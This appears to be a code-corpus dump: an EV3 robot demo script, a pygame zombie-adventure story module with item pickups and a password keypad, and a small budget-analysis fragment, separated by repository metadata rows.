ss=[ss2[i]-ss1[i] for i in range(Num_month-1)]
print("Average change:${}".format(sum(ss)/(Num_month-1)))
print("Greatest increase in Profits :{} (${})".format(months[ss.index(max(ss))+1],max(ss)))
print("Greatest Decrease in Profits :{} (${})".format(months[ss.index(min(ss))+1],min(ss)))
| 31.444444
| 106
| 0.626325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 327
| 0.288869
|
b1a801667f7526e28011c5f08b7558d194b2a413
| 3,508
|
py
|
Python
|
demo.py
|
sshopov/pyconau2017
|
e492e284a5afa5115f81fddf83546168b128591c
|
[
"MIT"
] | 21
|
2018-01-09T15:55:44.000Z
|
2020-03-22T06:27:52.000Z
|
demo.py
|
sshopov/pyconau2017
|
e492e284a5afa5115f81fddf83546168b128591c
|
[
"MIT"
] | null | null | null |
demo.py
|
sshopov/pyconau2017
|
e492e284a5afa5115f81fddf83546168b128591c
|
[
"MIT"
] | 9
|
2017-08-08T10:19:09.000Z
|
2019-03-01T12:12:30.000Z
|
#!/usr/bin/env python3
'''
Source name: demo.py
Author(s): Stoyan Shopov
Python Version: 3.* 32-bit or 64-bit
License: LGPL
Description:
This program was demoed on EV3D4 at PyCon Australia 2017.
It kicks off two threads: a move thread and a feel thread.
The move thread drives the bot forward until the feel thread
detects an obstacle.
Then the move thread makes the bot move around in a circle
until the feel thread detects a touch on the touch sensor.
Preconditions:
The program has been loaded on to EV3 running ev3dev
Postconditions:
Program exits cleanly.
References:
https://github.com/sshopov/pyconau2017
https://github.com/rhempel/ev3dev-lang-python
Release history:
----------------------------------------------------
0.0.1 - 06/08/2017:
Initial release
'''
import sys
import time
import threading
import signal
from ev3dev import ev3
def move(done):
lm = ev3.LargeMotor('outB'); assert lm.connected
rm = ev3.LargeMotor('outC'); assert rm.connected
cl = ev3.ColorSensor(); assert cl.connected
cl.mode='COL-AMBIENT'
speed = 250 #cl.value()
lm.run_forever(speed_sp=speed)
rm.run_forever(speed_sp=speed)
while not done.is_set():
time.sleep(1)
#stop both motors
lm.stop(stop_action='brake')
rm.stop(stop_action='brake')
lm.wait_while('running')
rm.wait_while('running')
#run around in a circle
done.clear()
lm.run_forever(speed_sp=speed)
while not done.is_set():
time.sleep(1)
lm.stop(stop_action='brake')
lm.wait_while('running')
def feel(done):
ir = ev3.InfraredSensor(); assert ir.connected
ts = ev3.TouchSensor(); assert ts.connected
screen = ev3.Screen()
sound = ev3.Sound()
screen.draw.text((60,40), 'Going for a walk')
screen.update()
while ir.proximity > 30:
if done.is_set():
break
time.sleep(0.1)
done.set() #this will set it running in a circle
ev3.Leds.set_color(ev3.Leds.LEFT, ev3.Leds.RED)
ev3.Leds.set_color(ev3.Leds.RIGHT, ev3.Leds.RED)
screen.clear()
screen.draw.text((60,20), 'There is something is front of me')
screen.update()
while not ts.is_pressed:
sound.speak("Where should I go next?").wait()
time.sleep(0.5)
done.set() #will stop the circle dance
# The 'done' event will be used to signal the threads to stop:
done = threading.Event()
# We also need to catch SIGINT (keyboard interrupt) and SIGTERM (termination
# signal from brickman) and exit gracefully:
def signal_handler(signal, frame):
done.set()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Now that we have the worker functions defined, lets run those in separate
# threads.
move_thread = threading.Thread(target=move, args=(done,))
feel_thread = threading.Thread(target=feel, args=(done,))
move_thread.start()
feel_thread.start()
# The main thread will wait for the 'back' button to be pressed. When that
# happens, it will signal the worker threads to stop and wait for their completion.
btn = ev3.Button()
while not btn.backspace and not done.is_set():
time.sleep(1)
done.set()
move_thread.join()
feel_thread.join()
ev3.Sound.speak('Farewell and good bye!').wait()
ev3.Leds.all_off()
| 26.37594
| 84
| 0.643672
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,579
| 0.450114
|
b1a8412c74612f899302b6781aec760fcfd3dd6d
| 21,742
|
py
|
Python
|
Game/story.py
|
starc52/GDE-Project
|
50ee4055e26c1873b1c21dcb2a8c2d05f7bca40f
|
[
"MIT"
] | null | null | null |
Game/story.py
|
starc52/GDE-Project
|
50ee4055e26c1873b1c21dcb2a8c2d05f7bca40f
|
[
"MIT"
] | null | null | null |
Game/story.py
|
starc52/GDE-Project
|
50ee4055e26c1873b1c21dcb2a8c2d05f7bca40f
|
[
"MIT"
] | 1
|
2021-07-06T03:38:24.000Z
|
2021-07-06T03:38:24.000Z
|
from Game.player import Player
from pygame import *
from Game.const import *
class Story:
""" Story line class """
def __init__(self, message, treasure, player, screen, fade, maps, sound):
self.screen = screen
self.message = message
self.treasure = treasure
self.player = player
self.fade = fade
self.maps = maps
self.sound = sound
        # just for testing; remove later
self.treasure.collectedItems.add(self.treasure.items['boat'][0])
self.selectedFirstLocation="rochelle"
self.mainWorldMsgFinished = False
self.gotWorldMap = False
self.BurntHouseMsgFinished = False
self.LabHouseMsgFinished = False
self.islandMsgFinished = False
self.passwordMsgFinished=False
self.shipCorridorMsgFinished = False
self.shipCabinMsgFinished = False
# Flag to see if game is over (player won)
self.gameWon = False
self.letter1 = transform.scale(image.load("resources/graphics/items/letter1_preview_rev_1.png"),(70,70))
self.letter2 = transform.scale(image.load("resources/graphics/items/letter1_preview_rev_1.png"),(70,70))
self.brochure = transform.scale(image.load("resources/graphics/items/brochure.png"),(80,80))
self.worldMap = transform.scale(image.load("resources/graphics/map/null.png"),(70,70))
self.key = transform.scale(image.load("resources/graphics/items/key.png"),(70,70))
self.laptop = transform.scale(image.load("resources/graphics/items/laptop.png"),(160,130))
self.testtube = transform.scale(image.load("resources/graphics/items/testtube.png"),(70,70))
self.microscope = transform.scale(image.load("resources/graphics/items/microscope.png"),(70,70))
self.chestbox = transform.scale(image.load("resources/graphics/items/chest.png"),(70,70))
        # Health potion sprite
self.healthPotion = transform.scale(image.load("resources/graphics/items/healthPotion.png"), (70,70))
# List of all available items (name -> description -> position -> cost -> rect)
self.availableItems = {
# "speedBoots" : [["These are the boots of Hermes.", "Legend says they increase your speed."], (156,135), 30, Rect(153,133,70,70)],
# "earthGem" : [["Some sort of shining gem.", "It seems useless..."], (876,270), 200, Rect(864,262,self.earthGemImage.get_width()*2,self.earthGemImage.get_height()*2)],
"healthPotion" : [["Potion to increase your health by 20."], (509,419), 50, Rect(509,419,70,70)],
# "newPrayer" : [["New prayer to use at the church.", "You have %s prayers."%str(self.prayers)], (132,336), 100, Rect(132,336,100,100)],
"brochure" : [[""], (876,270), 200, Rect(865,270,70,70)],
"letter1" : [["Dr.Gwen says to Dr.Nevlin, ' I fear the zombie virus is far", "deadlier than we ever imagined. I have many unconfirmed reports , but", "there is no point spreading panic.'"], (676,250), 200, Rect(664,242,100,100)],
"letter2" : [["You pick up Dr. Nevlin�s letter. 'Hope you are safe in the bunker.I ", "am working on the cure in our lab in Teshlor. I'm close.. The rest", "of it is gibberish - NEVLIN written repeatedly."],(132,336), 100, Rect(132,336,100,100)],
"worldMap" : [[""],(240,400), 100, Rect(240,400,70,70)],
"key" : [[""], (429,339), 30, Rect(429,339,70,70)],
"laptop" : [[""], (825,185), 200, Rect(825,185,100,100)],
"testtube" : [[""], (123.5,464), 200, Rect(123.5,464,70,70)],
"microscope" : [[""], (40.5,410), 200, Rect(40.5,410,70,70)],
"chestbox" : [["treasure box."], (541,46), 200, Rect(530,35,80,80)]
}
        # Return rect
self.shopReturn = Rect(833,508,300,300)
# -----------------------------------
# Keyboard actions
self.spaceReady = False
self.returnReady = False
self.pReady = False
def intro(self, next):
""" Introduction """
# Only do the narration scene once
if not self.mainWorldMsgFinished:
self.message.narration(["Clearly, this hideout has been deserted for quite some time.",\
"Who was hiding.. And from what?",\
], next, "top")
if self.message.done:
self.mainWorldMsgFinished = True
if not mac:
mixer.music.fadeout(500)
mixer.music.load(self.sound.getMusic("mainWorldTheme"))
mixer.music.play(loops=-1)
self.message.reset()
def hideout(self, click):
""" Main hideout """
pos = mouse.get_pos()
def msg(text):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (255,49))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(1500)
# Blit background
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
# Loop through the dictionary and draw the items
for key,val in self.availableItems.items():
if key == "letter1":
# Animate gem shine
self.screen.blit(self.letter1, val[1])
if key == "letter2":
# Animate gem shine
self.screen.blit(self.letter2, val[1])
# General description
# Loop through items
for item in [
["letter1", Rect(864,262,self.letter1.get_width()*2,self.letter1.get_height()*2)],
["letter2", Rect(864,262,self.letter2.get_width()*2,self.letter2.get_height()*2)]
]:
if not item[1].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render("Hover over an item to view its description.", True, (0,0,0)), (245,40))
self.screen.blit(self.message.font.render("Click on it to collect it.", True, (0,0,0)), (245,90))
else:
if not item[0] in self.availableItems:
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render("Hover over item for its description.", True, (0,0,0)), (245,40))
self.screen.blit(self.message.font.render("Click on it to collect it.", True, (0,0,0)), (245,90))
if "letter1" in self.availableItems:
if self.availableItems["letter1"][3].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render(self.availableItems["letter1"][0][0], True, (0,0,0)), (245,40))
self.screen.blit(self.message.font.render(self.availableItems["letter1"][0][1], True, (0,0,0)), (245,90))
self.screen.blit(self.message.font.render(self.availableItems["letter1"][0][2], True, (0,0,0)), (245,140))
if click:
                    # Add item to inventory
                    self.treasure.collectedItems.add("letter1")
                    # Remove item from dictionary
                    self.availableItems.pop("letter1", None)
if "letter2" in self.availableItems:
if self.availableItems["letter2"][3].collidepoint(pos):
                self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render(self.availableItems["letter2"][0][0], True, (0,0,0)), (245,40))
self.screen.blit(self.message.font.render(self.availableItems["letter2"][0][1], True, (0,0,0)), (245,90))
self.screen.blit(self.message.font.render(self.availableItems["letter2"][0][2], True, (0,0,0)), (245,140))
if click:
                    # Add item to inventory
                    self.treasure.collectedItems.add("letter2")
                    # Remove item from dictionary
                    self.availableItems.pop("letter2", None)
if self.shopReturn.collidepoint(pos) and click:
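            # Scene-change sequence used throughout: fade out, rebuild the
            # scene, reposition the player, reset the fade, then swap music.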
# Fade into main world
self.fade.fadeDark(self.maps.allScenes["mainWorld"][0], self.screen, self.player.mapCoords["mainWorld"])
# Create new scene
self.maps.newScene("mainWorld")
# Set player coordinates
self.player.x = self.player.mapx+9311
self.player.y = self.player.mapy+2168
# Reset fade
self.fade.reset()
# Change music
if not mac:
mixer.music.fadeout(500)
mixer.music.load(self.sound.getMusic("mainWorldTheme"))
mixer.music.play(loops=-1)
    def shipCorridor(self, next):
        """ Ship corridor scene """
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
# Only do the narration scene once
if not self.shipCorridorMsgFinished:
self.message.narration(["You want answers and the only way to get them is get up and explore."], next, "top")
if self.message.done:
self.shipCorridorMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "brochure":
self.screen.blit(self.brochure, val[1])
break
pos=[self.player.x,self.player.y]
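        # Pickups here trigger on the player's position (walking over the
        # item), not the mouse cursor as in hideout().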
        # Brochure pickup
if "brochure" in self.availableItems:
if self.availableItems["brochure"][3].collidepoint(pos):
                # Show the item's description
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["brochure"][0][0], True, (0,0,0)), (275,59))
self.treasure.collectedItems.add("brochure")
self.availableItems.pop("brochure", None)
# Notification
msg("It's a brochure about some ship... The Black Pearl!", 3000)
msg("Someone has scrawled, �CELL HERO� on it.", 3000)
msg("Is it a hint?", 3000)
    def shipCabin(self, next):
        """ Ship cabin (control room) scene """
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
if not self.shipCabinMsgFinished:
self.message.narration(["Looks like a control room of sorts"], next, "top")
if self.message.done:
self.shipCabinMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "worldMap":
self.screen.blit(self.worldMap, val[1])
pos=[self.player.x,self.player.y]
        # World map pickup
if "worldMap" in self.availableItems:
if self.availableItems["worldMap"][3].collidepoint(pos):
                # Show the item's description
self.gotWorldMap = True
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["worldMap"][0][0], True, (0,0,0)), (275,59))
self.treasure.collectedItems.add("worldMap")
self.availableItems.pop("worldMap", None)
# Notification
msg("This is no ordinary map.", 2000)
msg("It�s as though someone has marked on it... just for you.", 3000)
msg("As you read it, it is stored in the hard-disk of your memory.", 3000)
msg("Activate the map by pressing the map button on the right.", 3000)
msg("The ship demands the location of your first stop.", 3000)
msg("What is it?", 2000)
        # TODO: prompt the player for the first destination here, e.g.:
        # while not self.selectedFirstLocation:
        #     self.selectedFirstLocation = self.message.firstLocationConfirm(click)
        #     display.flip()
    def BurntHouse(self, next):
        """ Burnt house scene """
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
# Only do the narration scene once
if not self.BurntHouseMsgFinished:
self.message.narration(["Acccchhhooo! You start coughing and sneezing as soon as you enter.",
"The smell of burnt wood and ash is too strong.",
"Maybe you will find something useful in the ruins?"
], next, "top")
if self.message.done:
self.BurntHouseMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "key":
self.screen.blit(self.key, val[1])
if key == "laptop":
self.screen.blit(self.laptop, val[1])
pos=[self.player.x,self.player.y]
        # Key pickup
if "key" in self.availableItems:
if self.availableItems["key"][3].collidepoint(pos):
                # Show the item's description
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["key"][0][0], True, (0,0,0)), (275,59))
self.treasure.collectedItems.add("key")
self.availableItems.pop("key", None)
# Notification
msg("The key is too light for its size (titanium, atomic number 22).", 3000)
msg("It has a striped pattern(barcode signature), you think.", 3000)
msg("Now how did you know that?", 2000)
#print("pos 2 ")
#print(pos)
# Earth gem
if "laptop" in self.availableItems:
if self.availableItems["laptop"][3].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["laptop"][0][0], True, (0,0,0)), (275,59))
self.treasure.collectedItems.add("laptop")
self.availableItems.pop("laptop", None)
# Notification
msg("Your cyborg nature acts instinctively.", 2500)
msg("You retrieve the hard-disk and connect it to your brain.", 3000)
msg("Alas, most sectors are damaged and you see only random noise.", 3000)
msg("A lone grainy video plays.", 2000)
msg("�Frequent zombie attacks o--- coast...�", 2000)
msg("�high infection rate in h--- Aquesta...�, a news reporter is saying.", 3000)
msg("Aquesta. The name triggers something.", 2000)
msg("All around him, there is rubble.", 2500)
msg("People are running and screaming.", 2500)
msg("You just realise you haven�t seen another person in days.", 3000)
msg("Did the zombies kill everyone else ?", 2500)
    def Lab(self, next):
        """ Laboratory scene """
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,200)), (229,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (245,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
# Only do the narration scene once
if not self.LabHouseMsgFinished:
self.message.narration(["You have a sense of deja vu. ",
"Yes, you had come here with Dr. Gwen!"
], next, "top")
if self.message.done:
self.LabHouseMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "testtube":
self.screen.blit(self.testtube, val[1])
if key == "microscope":
self.screen.blit(self.microscope, val[1])
pos=[self.player.x,self.player.y]
        # Test tube pickup
if "testtube" in self.availableItems:
if self.availableItems["testtube"][3].collidepoint(pos):
                # Show the item's description
self.screen.blit(transform.scale(self.message.background, (600,150)), (229,30))
self.screen.blit(self.message.font.render(self.availableItems["testtube"][0][0], True, (0,0,0)), (255,59))
self.treasure.collectedItems.add("testtube")
self.availableItems.pop("testtube", None)
# Notification
msg("These test tubes are strangely familiar�", 3000)
msg("You remember now, they are yours!", 3000)
msg("Yes, you used to work here before as a researcher.", 3000)
msg("Your name is Esra Stryker.", 2000)
msg("Dr. Gwen and Dr. Nevlin were your colleagues and best friends.", 3000)
msg("You recall everything right upto your accident. ", 3000)
msg("Aha! Your friends made you a cyborg to save your life. ", 3000)
msg("You must have been on the boat to get better treatment in Rochelle.", 3000)
msg("They left behind the clues in case they didn�t survive.", 3000)
#print("pos 2 ")
#print(pos)
if "microscope" in self.availableItems:
if self.availableItems["microscope"][3].collidepoint(pos):
self.screen.blit(transform.scale(self.message.background, (600,150)), (229,30))
self.screen.blit(self.message.font.render(self.availableItems["microscope"][0][0], True, (0,0,0)), (255,59))
self.treasure.collectedItems.add("microscope")
self.availableItems.pop("microscope", None)
# Notification
msg("You peer through the microscope, observing the virus strains.", 3000)
msg("You created them here.", 2000)
msg("You had a rare gene that made you immune. ", 3000)
msg("There was a mutation in your experiment and... ", 3000)
msg("the zombie virus leaked out. Now everyone is gone.", 2000)
msg("A wave of shame washes over you. ", 2500)
msg("But wait, weren�t you trying to make the cure as well?", 3000)
msg("Where is it? ", 2000)
    def dungeon(self, next):
        """ Dungeon scene """
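        # Stub: only the msg helper is defined below; the scene logic
        # appears unimplemented.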
def msg(text):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(1600)
    def finalisland(self, next):
        """ Final island scene """
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
if not self.islandMsgFinished:
self.message.narration(["The cure is inside.",
" In order to access it, ",
" you must use the password."
], next,"bottom")
if self.message.done:
self.islandMsgFinished = True
self.message.reset()
for key,val in self.availableItems.items():
if key == "chestbox":
self.screen.blit(self.chestbox, val[1])
pos=[self.player.x,self.player.y]
        # Chest box (opens the password safe)
if "chestbox" in self.availableItems:
if self.availableItems["chestbox"][3].collidepoint(pos):
                # Show the item's description
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(self.availableItems["chestbox"][0][0], True, (0,0,0)), (275,59))
self.fade.fadeDark(self.maps.allScenes["islandPassword"][0], self.screen, (0, 0))
# Create new scene
self.maps.newScene("islandPassword")
# Set player coordinates
self.player.x = self.player.mapx+516
self.player.y = self.player.mapy+46
# Reset fade
self.fade.reset()
    def islandPassword(self, click, password):
        """ Password keypad to open the safe """
pos = mouse.get_pos()
def msg(text, length):
""" Render message """
self.screen.blit(transform.scale(self.message.background, (600,150)), (259,30))
self.screen.blit(self.message.font.render(text, True, (0,0,0)), (275,59))
self.treasure.render(True, False, False, False, self.message)
# Render and pause
display.flip()
time.wait(length)
keysDict = {
"1": Rect(96, 72, 170, 90),
"2": Rect(315, 72, 170, 90),
"3": Rect(531, 72, 170, 90),
"4": Rect(96, 200, 170, 90),
"5": Rect(315, 200, 170, 90),
"6": Rect(531, 200, 170, 90),
"7": Rect(96, 322, 170, 90),
"8": Rect(315, 322, 170, 90),
"9": Rect(531, 322, 170, 90),
"0": Rect(315, 451, 170, 90),
"cancel": Rect(803, 72, 170, 90),
"clear": Rect(803, 200, 170, 90),
"enter": Rect(803, 322, 170, 90)
}
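        # On-screen keypad: digits in a 3x4 phone-style grid, with
        # cancel/clear/enter stacked on the right (the rects presumably
        # match the button positions in the keypad background art).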
if not self.passwordMsgFinished:
msg("Enter Password", 1000)
            self.passwordMsgFinished = True
correct = ["6", "3", "8", "5", "4", "6"]#original password
for key in keysDict:
if keysDict[key].collidepoint(pos):
if click:
# print("Pressed", key)
if key!="cancel" and key!="clear" and key!="enter":
password.append(key)
if key== "cancel":
self.fade.fadeDark(self.maps.allScenes["finalisland"][0], self.screen, (0, 0))
# Create new scene
self.maps.newScene("finalisland")
# Set player coordinates
self.player.x = 510
self.player.y = 46
# Reset fade
self.fade.reset()
if key=="clear":
password.clear()
if key == "enter":
if not ("key" in self.treasure.collectedItems):
msg("Key Missing", 1500)
else:
if password == correct:
#print("correct password")
self.fade.fadeDark(self.maps.allScenes["finalisland"][0], self.screen, (0, 0))
# Create new scene
self.maps.newScene("finalisland")
# Set player coordinates
self.player.x = 516
self.player.y = 46
# Reset fade
self.fade.reset()
msg("You have succesfully opened the safe.", 3000)
self.gameWon=True
else:
msg("Wrong password. Press clear and try again.", 1500)